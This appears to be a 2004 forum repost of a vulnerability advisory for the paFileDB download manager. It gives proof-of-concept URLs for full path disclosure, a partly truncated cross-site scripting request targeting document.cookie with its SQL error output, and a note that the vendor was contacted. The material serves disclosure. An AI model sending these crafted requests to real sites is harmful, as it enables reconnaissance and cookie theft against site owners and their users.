Multiple Vulnerabilities Pafiledb

qcred11

Apr 28 2004, 03:13 PM

QUOTE

1.- Vulnerabilities:
---------------

A. Full path disclosure:

This vulnerability would allow a remote user to determine the full
path to the web root directory and other potentially sensitive information.

http://site/includes/admin/login.php?formn...mpass=DarkBicho
&B1=%3E%3E+Log+In+%3C%3C&action=admin&login=do

and we get standard error messages, revealing the full path to the nuke
engine scripting files:

Fatal error: Call to undefined function: locbar() in
/home/site/includes/admin/login.php
on line 12

http://localhost/includes/category.php
http://localhost/includes/search.php
http://localhost/includes/main.php
http://localhost/includes/viewall.php
http://localhost/includes/download.php
http://localhost/includes/email.php
http://localhost/includes/file.php
http://localhost/includes/rate.php
http://localhost/includes/stats.php

2. Cross-Site Scripting aka XSS:
----------------------------

Cross-Site Scripting in id variable:

http://localhost/pafiledb.php?action=categ...</script>

paFileDB was unable to successfully run a MySQL query.
MySQL Returned this error: You have an error in your SQL syntax near
'(document.cookie);'' at line 1 Error number: 1064
The query that caused this error was: SELECT * FROM pafiledb_cat WHERE
cat_id = '''

3.- SOLUTION:
¨¨¨¨¨¨¨¨
Vendors were contacted many weeks ago and plan to release a fixed
version soon.
Check the Video Gallery website for updates and official release
details.

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.